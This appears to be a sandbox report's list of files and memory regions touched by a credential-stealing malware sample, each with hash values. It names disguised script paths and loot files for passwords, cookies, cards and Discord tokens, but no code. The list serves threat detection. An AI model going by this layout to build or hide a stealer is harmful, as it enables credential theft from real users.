SHA512 a475561e14295154a6804c35c030e82408c6231155768e45cb3d34675f78f0628c1887cca1ae32180a0248272f8a699009a6e8edcb97093f54541458d4a09203

C:\Users\Admin\AppData\Local\Temp\RES4083.tmp

MD5 c970867912aca0cbe5efcdd171326ab5
SHA1 4084d5daa294e604f426e15474bb8021cd0142d8
SHA256 3594a71368e2d8b62368767f0c941639544d30fa909e3d8b0b03524358d9db5c
SHA512 eb73ee637587f1255a6d1491e86f9b214f7881df6318c30c3fcdc9aba225dd3f402b2eb46e1f8c14933356f05ce630dabb23092b301fe3a30a82cf412b7f1558

memory/116-99-0x000001C9A1590000-0x000001C9A1598000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\coslunty\coslunty.dll

MD5 a8815eb028efb6f62f393ee532ed1b77
SHA1 01807841597d3de419d0a086cddaa40b0802c5b0
SHA256 f01bb28ad54e61dceaa5ac69cb732d6c06557694949c644bde4f1fe1e872e294
SHA512 eccd1d8f020c1d95b98993d65297d101a047da0a9b7cff5fa480d621511b499185011f0ea41d068c5bc8016a21201995be9ee7fe8743c88abe8311678c8bd0d9

memory/116-103-0x00007FFEDEA20000-0x00007FFEDF4E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/2452-115-0x0000022B24E70000-0x0000022B24EC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d0e052ba84a5a94a12f82b5523b45e
SHA1 18c9412da40f1d565c47dc150f782672a8913baa
SHA256 0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d
SHA512 78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40fac1b1cdc131cce25a068795a775f1
SHA1 a591f8ef09d8b1f60068724d21a49a43b3273121
SHA256 02a4aa345dba123257bf2b082859ffca77a042cb9fedc66e5d2506b638d2471e
SHA512 2715f068e0e8bc128b2ed10abe3e417dcf7b8e624d974746d9b1232d5a1f3ab2d7cd8787b2a8e6f4701e732389758712bcdd0939e7d09ee6329d368b652a371f

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 1c1a0b37f465f95dad89acd8f6a31416
SHA1 d48ede323bcaa629d1e26d37473aeaddec17bfdd
SHA256 2613d861e36c5ab2353854cde7ef9fc8ddd500db78fe96fdd768ddd80a739b76
SHA512 2a1b73ae261f3a9b45f6f12dbb5f31a4666c04d476b42e9c63720dd1999665e1075507d22c79f4066d24d7ae44c0e3fa062fe8bc42f5360cf0b70bea4ecd97c6

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.cmdline

MD5 92471d35b210f8951918e5386f9a58f0
SHA1 7ccb321acfe8c40acffb3603e4a54a0e34342917
SHA256 a6b79720e61a59c5584bb6a45897176657315c391f8cc1ba36cd454024dffd76
SHA512 0b0fbd56d794bbd1ed5db88a837f0ee84c7f88fd45dd9c2daa3aa412ee19a63c6d6c964cc118d5e4294f28d8596c681432e21ebb075c3b08c5e67f7469b5cea9

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\lssg30o3\CSC88193676E09C4075BE3495B5E738BB2C.TMP

MD5 f00da05d36794cdbd78507c7fd0d3685
SHA1 70905cd7f5168d17577f9a6636f894dffe88b562
SHA256 fe335057214f7f5e1089fe4dcd3d31eb8fd6812305e6c5541ed71fa62d5ec709
SHA512 f250190493a37bb45bd3112f773e729c26ec7ee1c7352bc0821dbf93c3a8a951381cc21aad398c68029e7eedd2b11ec27dc9eb7933b0af4d0b5fb7a9720b42a1

C:\Users\Admin\AppData\Local\Temp\RES4769.tmp

MD5 abacb5740b484b0897d0cc9e437a3917
SHA1 ba619616dc0ce0e31a50c4b39c2f686fff2fe6c8
SHA256 665641115163ba2f004a4b81c89c8f916bc5eea201c28920e598cd3f294581b3
SHA512 821911e8cf3b5eaa5d493696b8d12542dae9090977d97487c1300deb3332f5eef29e9e73cf3ca67ad9ac8d3967d2d66baabd4bdf2f8fa26fc308f753a50ee71f

memory/2600-190-0x000001E2A8700000-0x000001E2A8708000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lssg30o3\lssg30o3.dll

MD5 62244f4c03be7c72f1322ead0a0ed252
SHA1 0d22874b3bd2769028b653dac07e2a43fe45358e
SHA256 37c320361b13068d29c680f240fa719c24e4b11f5b4ec6076e67e4cc73be0f40
SHA512 c72cb1288d00eaed4c944eb6fea36cf939df4ab1e3514484646ffbdd9584a47b02ab21bc8a39b0ccd1c7d40ad9d1acbd5a0a4a013706861877bede4002e59de3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2a869dfbde8fa83a15ff1ed19d7d4bfd
SHA1 f1249a1656712b544fd4a4cef27c9b45aac7afea
SHA256 048b8d982de76b0fe7baeac01751f07c2ee1a47a1449c540fc2cc0c42c043b28
SHA512 347bc58e2c28d5ab6c8403baf47290e6143edbab323b8ece5dba625a3dc760dd83ab4feb6be76510e160007d94d3a1f41a825c6464b37fffa5b8ddd74f3e5283

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ba169f4dcbbf147fe78ef0061a95e83b
SHA1 92a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA256 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA512 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 17f4d5ecc1e1842edb8c17a16fd53f94
SHA1 7efa50bc8d794a8fb001adadf00bd39791142d22
SHA256 add39b4f1b10813294ee6bfb45143828c29d7188049c39000cd498d57f151729
SHA512 8c044cac1acbce647e84dd1ca31b1672ed5611208316d85f7c9544f1cc8b7c05fb7b989ab3286559b28bd61cd5a17ba1f4a07f5e9c0b2c25726f149ef88437d3

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\stolen_files.zip

MD5 76cdb2bad9582d23c1f6f4d868218d6c
SHA1 b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Serial-Check.txt

MD5 88f6b1c98f5414d926b8bbaa1f5fd708
SHA1 835602036888c2a72c6e18e8ec10c78a9c98fcd4
SHA256 c7fdca06ab8615d4210a01b82bd6af31d42ba215ade9fc6aea7b5be4cd69880b
SHA512 6f2261bfa35b26fc5e77abc5888c80437f021a4d838fd4a43200f8a015df771d9b2716497d73f90544079f4ee4098322234cc9e6a089dda21f56bfb40fcc0beb

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\debug.log

MD5 9f308dd2bdd0ae589e27f6ee0fbcd86b
SHA1 23ef4b61dd6b94a6c63a2d826229d47a1a767efb
SHA256 f1c7444261a19d09e4a719aac782fab31fdaa5cf5a3fd82297a027390841b9e1
SHA512 dab43b51f9b3c4fdf3ba98bf47f984c837e461a9102b366945119480b646816f78124fde9f485c7457d024b967f0286a3141341f8a281ec5e3da631f40b6cd2d

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cookies\Google_Default.txt

MD5 52f6eeca74e364afa08cff3dfbc78020
SHA1 a4cd16c60c913408ab271ce55093152f1720cb09
SHA256 ac2f9384b893459910616cc3defff8ec4840236eb77a27f95a627ba54f0972a8
SHA512 a43541c954af9f424c34d7e01fdfe9f5d38af8a856dce48bc944d115df69e2c0680e2f4ab14f2212f6cbaf7a7a1b233ac788ba81a780f874dbe65ff214762f12

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 64d2acbce1ae3728d05215c5371487e0
SHA1 a39d85baf08595104b7a8d196cfc8bbc6a7b6337
SHA256 786d2c088da950be856cb21a6df9a5366cc37e607736809f6316e59b0c3688a0
SHA512 920f324f62b3b33ee1c1c9ca05f7612fd77e9b0cad5464b5f1a82907c0dac899b54b7c57f4e223af605321869c8a795e588552768b33c6d7ec77265fa090c50d

C:\ProgramData\Steam\Launcher\EN-Tmuacblb.zip

MD5 35d4f466ab76739a25c28aa54607bedd
SHA1 e72ac9adc72b94aa9f7b46e56f3db3e37aa1b9bb
SHA256 b6483d4b7fcf5744a6c58f88446ea35022b59fe8526598048d677f3a14ec51ac
SHA512 35701c57e9bacf8ee0e1fceb03d16d7d8378435c31d07bd56c958654773b844d74131a0280089755754515e3255fd25a67e09e068c45bedb893cac59cbf4c273

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ca24df1817fa1aa670674846e5d41614
SHA1 dac66ea013bcc46d24f1ece855568187c6080eaf
SHA256 3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db
SHA512 fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

C:\ProgramData\Steam\Launcher\EN-Tmuacblb\Screenshots\Screenshot.png

MD5 eb3cb58667080471f3f51571ad0b2b73
SHA1 10a6409c643a3b45be16aa6c8a72ece21fbe3f98
SHA256 704f1a69c2ae9cf051bc69d87e7d8f63fa89d8caa94f414f75673354558a6f36
SHA512 4c741c1596dd2beadd23faeb9e0087996a6a35332e7aa9d12cfee89428595653d56025f9a1f46828f7e1ad1c1f4d68b5abbc18533b155647617a28917856ad14

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

C:\ProgramData\Steam\Launcher\EN-TMU~1\debug.log

MD5 fd354c883ccb4e0d27f69e75461b26d9
SHA1 0b8d6ce86d54c79667b3a5f30031d8c390258529
SHA256 38ddef399d35ccb01653a2befc8beb2d0dd84a1874736458a9e4d160575f627b
SHA512 cc11e56c392a3e7883f7d95845467fdcdaff13475d93241b26cd9acf8249fa04299f90f62d6ae282abf0f7506d57a82badb4e90150479908a299a8a7d0e5d725

\??\pipe\crashpad_1936_ZHELEHSDTFCUZMZO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4cde33d1661a07833ed950dbe2af9ba5
SHA1 6cce137f635fbd842f17c612a28ea4c1d02c5eee
SHA256 26cb16521cf412011440d6d7a0303907ff58f892014e918746f113698c5eeff8
SHA512 14e5dd5ede35210f29225f8f8eefd563837a938f32d56afb0a25deceddc2d74983ffd3d71e53112d2bb8939f8a63eed7d0d26de15f516fe800c4fe67a2ed4526

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 9baf86de20d4d358e42c2c96388b0447
SHA1 10aa56883431c3489d8254fa6c86af8403b070ec
SHA256 3f9d5ea3f34c851252af19cccb23ff34d7346e3fa4344f0dd827261e932a0771
SHA512 91d6ebd9d8ef989a056722ae7e16ebcc4624c835dd6ff8ea51a19d1febaa9e87f13ff478f5e02688531291b57cbe0647535006c9b3f1060fe861b1ec6145c850

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fdbeeab3d69c3518ad5aad71d6c0ab7d
SHA1 7df5dce18b805508bfac5e561ea10ee73987b1bc
SHA256 7c52872c0c19e3cfc13c772e1cae7e188aab7769c399c23b1cf87faff9a23620
SHA512 8e52a1be56ceb1129a28f9ab945b5745757ecad0af92bcc608da597c228fcc54a6a21e34e6d9181e360c64b737e6df89de357b25dfefb1b38fba499f6aedf557

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 cac471edae59cbd172ed094029ed8f66
SHA1 4fb394dfd98782f53c87409b38610f95aeba1baf
SHA256 94c36877ed3ff111cba3fe96b95f1619d347efde7b8a86fb46fe6aa3baba9c00
SHA512 26342b7eff83e914135caf217f8372644b367d2f8dc4bb2dba7e8351f815babcbf1a1c2323e30baed5ab9e8984089113bbfc82451b9032903829b6a8c48f4ca7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8f980ce3742e8437256e8bd2a63431b3
SHA1 355bdd88723a8c16d60b468258dacd5760547317
SHA256 7842c35679b29eb9f9333f6a7d00f4daf64b11a5c1130aa6f250320ecdc1fe97
SHA512 70ee255dc36b6471df679c177b2f295e36b7b24315d20ce845bc674ed0e74b3e59d31c31d397c1318698f3700dd455982f65d1fdc9ebf25c2e2509935d993195

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7860fb57-cbcf-4ca4-b2b2-27472d461584.tmp

MD5 34ffc1842610c56916f736c06677232d
SHA1 e78d63432201b7c893214ce6de689db137a28d71
SHA256 f7a8fdd8d08ab98e28b8cb5f863e5d71708a07f68d1082c9d2048ac0cc7eb301
SHA512 2b00261c4aa78ac1c3cd05c38109ccc47fbd5a346aca7970684a06395772cfc491097db97ec834bbcb17f808eb8e25120bb9fa1a04504adda09b6bbce45bda48

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dedb2b991daceb3bfd6a046e5610c3c4
SHA1 f0cef52e7231e4d10089f6bac7630ff74e8e0f14
SHA256 d9742e532ba04f25967770b059da74dc1e63036c97ddb20b4adfab99e3d9b970
SHA512 5caf34746d96b9d4377d9394f752d8fb2c5b70550cab9d5f4cc634349543e15c7f37806849becee1fb971716ef5e1f27b5fa3d49b60cff0dcd15780941e46b7a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 56067634f68231081c4bd5bdbfcc202f
SHA1 5582776da6ffc75bb0973840fc3d15598bc09eb1
SHA256 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4
SHA512 c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 81e892ca5c5683efdf9135fe0f2adb15
SHA1 39159b30226d98a465ece1da28dc87088b20ecad
SHA256 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17
SHA512 c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5eeec4d15302f42a82df93d600b1f8c0
SHA1 6087e82bd43da744da42e4341f172d9eae908a64
SHA256 9dd5c61453756a616c19347f137eb1e39259b3e5b8aa662beff3374967a6be90
SHA512 e1310dbf4f0e4783f11bc64a50843b12c3fe4feb74f0df2bed63c3ec0ab290066bd9e7058a2d2a25599acba479702de431ac8e847de465ea4f47f1f569652064

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0671b025ae42325036aa16875bac29e3
SHA1 d0bf5bd5205ad8da127cb81cf7a44ffb8b35c9a2
SHA256 dc5407fa3eeb79d72de707444ec16fd183c1840e637b6c4a08473c5c4cdd7585
SHA512 8cc3a15a0bb3a8e905e9b207fb9f42e77ecfa8ce46283fe51ca24660db072f61fa4a8f5185e4957561b388eb3f2e766ee5d88c63f06d44b5ddb181108e40f8af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 65962888aa9f8bff28033e1da7e2ff6e
SHA1 e822b7bd6594e42ea34e30db1675f25a8d362a09
SHA256 937589311dcc02ae0e3cd88e1e2b8fcd26763765f42215215412cf3b2541d30f
SHA512 b680cac0454798bb2804b766d28005e7d972d206d7c19451d8611e2e557eb711862b8747fed24195233560cfca7edf8a0044422c466f560732d6cba16b343433

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f42e13c3d1fceeecd62a10e3b2e71de7
SHA1 130a9b1184928816e1325a5321641b4186c5dcc4
SHA256 dc7b492cafc646fe73d09440be148ebb13407adcc15757e747d686586bdb9a22
SHA512 e5343c3b5f39d2638355d275cd096aa88c3d8cbd721b1f518f81d7e1ad097b552dc85342f4ca6a6bd64499f15f205db40f221691a8e8848e110334717a551b13

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b117700d100175a10390509c063fa8d0
SHA1 81e70fad37be516f0ccf9236a4c4fe600955dbd1
SHA256 aa0982aa91f02e4fe40f23403a62bc731f937d1987e578afb7ab854eaa9bb88d
SHA512 2d68236d21e603a651b93618be9d4a538502580f1e816b17cc1ffdad7f634b84c2c88e8f04ef1d7da49867688331a77d8d636b932becc91fb630a30933c3439e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 823c9048e004511db6e78b05057599b1
SHA1 9863cdd21e8716895841c20e9a429817c4851832
SHA256 f28da4f0dd1ca0ab0176fd62871ecda83d01002f22d0b97b4705a870f98afd67
SHA512 5c5c40c62fb5427b80d0323fc410061391a1efd02e766dd553209f9a5dee7c681326dce486938d82f36ba67667e672a841dd6ef136bfeeb1d685c4d04c0c4a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588af5.TMP

MD5 624eac83680b920da3736d9b9c69c160
SHA1 f0af39c89ad3084d5274e372b5f41eab19b7c3c3
SHA256 7c12d06bebbe90291fda7c84ca71916f2b24339ea26931aeb7d0d8dcf6b1c19c
SHA512 9d2c884f8607eef22c7d4267be90f232e56190923c64e911d87ea7715e2a304ffeda8d076b75050f7915c73113f4960cd4bf03a857f641383274493cc7735e93

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 654bd97468086456ac1d3c1bad2ed77b
SHA1 c2951b471fe7bc20ce37e41652b7559f1c46380f
SHA256 6f0fcd9adcba9413e6c73b5f684810180c4aa67bf7110d5b59a5fc0d61750c7d
SHA512 0fe96b2ec1dd649874d6412f67ba16550bf5474c41d00c5a6101b8a4dc25cdfb344efe4b8310765fbad68f63155236c2d864a901ffb38a383685ee6d87ce456e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.roblox.com_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 29ac4c85cb5d714d673ae94b47fbaaf1
SHA1 b68de1095e403c3123addf5ea81d8a0fc3b9fba2
SHA256 b49357f9e8f41345f2e8d734b448175eceb8882cfc74f19603b84a2c02b6d342
SHA512 af1c5d4a0502a90f2ef12b972e390c6f516b58be6628d8fe8a2276d9ba9a76759eba30e0656ca5749e7167d6f7d62ff855f56c78efe12ddec247af8ffc92e873

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 494b7ac2ec50cf97317996875b9ac273
SHA1 de99f85856ceab158048af5a91aa08a2ff993c53
SHA256 ba6eef6705db44c3cc525ece3ca42e8cf996216e324240d91e46bd2376009716
SHA512 0fa952990cfc5f559958c1c0f6314116b5d7dcb01286be9cdceec449a5bf9e3cf490e9b0f0b595ab0aebdfb5832a5dad9373233b614cd8fdba10c975510ca5aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e932ccff7b1089cc3e840c28423c43d7
SHA1 0266709a1731b799b1a8ba4290745948c0bf81c4
SHA256 fd31212946e980581985841da2c0f0f192a4faa30e73cec89d81d27e2e3c2827
SHA512 aadf07d7ed4d0c4722b84a072be78a7c69e247d9f1e084e92cf17155dab323861fc036d6957bdfa1ac420be5f5d7b38d56ef80f021a165b1667d8939a2754be6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 01c5dbff22c6d0317bbe4bb3098d7c96
SHA1 3e0577212304c62921559f45baf93609ae358f1b
SHA256 905ddc8bd03ca8f16900b86d54341d2d1d4e7055d2ad292c995fe9bff902b7bc
SHA512 ef94dbf95fd5549c2d624bc99651abbbd49c68c07fed8430b3b30a1ea1f331a8bf299efd3597c299750ed0da89a8f56b93fc76b243a964cbfe9090c420571cc8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 63a3eff9e2cca9c6e6a41537b664b662
SHA1 4241c5c40633b30f31a45e7caad3d8bdc52eb8aa
SHA256 76bd4112af8320946e540ba6999be3f9b1655e31623547ed9a08df68a27cee98
SHA512 611dffd7717193477ed2512f82a793824173f55b7c47801a58be5b141f833cd5d8897ab77b3ae30f04a39dd2fcbbaaffbf5d88e7db7d3ed7f3fcda0fd10950d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e252f1068df176a3c486d4fb25effe73
SHA1 8c8724908be6fa0e29587ed74d0c3e23d45cf1d5
SHA256 c9cb4feb2fc4f38b512ea3aa184d549d89b27f8a0614be7a717d4ce3e1e18f39
SHA512 f49958df9369cc160d98a247bd53045382759837a02151a413d0d225ef3a90962e721e99b4207151b9a935d766cb33a1e9c035e4bf2c214ead969b036fddfcba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2e63d57769fd4fd1f832d3e2691841e1
SHA1 326c3ef60bc8874dfbd95410e7fb07c194606702
SHA256 3db1491c2fa4a9343eae4c15ae2cf0e522220f8ecfe0172ea24bf40f2d3fc52c
SHA512 a7548d3b1f19e81feac71c8e7aae8b356e5cd844f0e7d5a8bb5c2289fb2510e34415a9da11e33d5480813ec9a275e58e077473c4c45b74cb8f9222fcfa2cb20a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0cb9a27a279f0a2b486a765e993a3132
SHA1 7e13a314f28b7fd6548de68b37f1abce6ef846a1
SHA256 e7746a7dfe0bb59f5124d2a4cd4ca65a95d1483f7710e0ed3bc043d137f528ce
SHA512 3d25034261dfd4566c064a0773bdae1b2b7cae09d427a48f4dbfd1be9aca0a46db67bc7f03e7ec4c970258eb39af1000131bcfc0efb57fe0799824ed78a4eee9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a07276f162db0e70df5c55831382b04b
SHA1 71125a94c64b734c6fc978ec157a70e6a4009a89
SHA256 cd0051acc4e8ce2c194c007c3269cc05ee7d5dea4b020f0bab8398dbc53b1b15
SHA512 fb7b873ae81cd3b12bcfe0bee9d652bae4881bae4dabc933de75087c3a74bdf22ac36eec698cb3ff941247fdce5fda9eb10aa8838fe80364c65063e9a664aafd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 42fcde8f4def7d287358b7162f2706b6
SHA1 76ad56a88fe9f67fe23273d9d3df7de36e295c62
SHA256 14895a2b6a84b4da7e5e4eca5836e4a0c95973788997fa5f86cd35802bf55759
SHA512 8f07ff20e413ae9eb00d44bf83f5c6cf24409cb11bbe85a75abbd241cd6b4102d0fab8ccbe3d252d5abfc5be2b6ddfcb074ad0b194d7148eafffcc219fe00d42

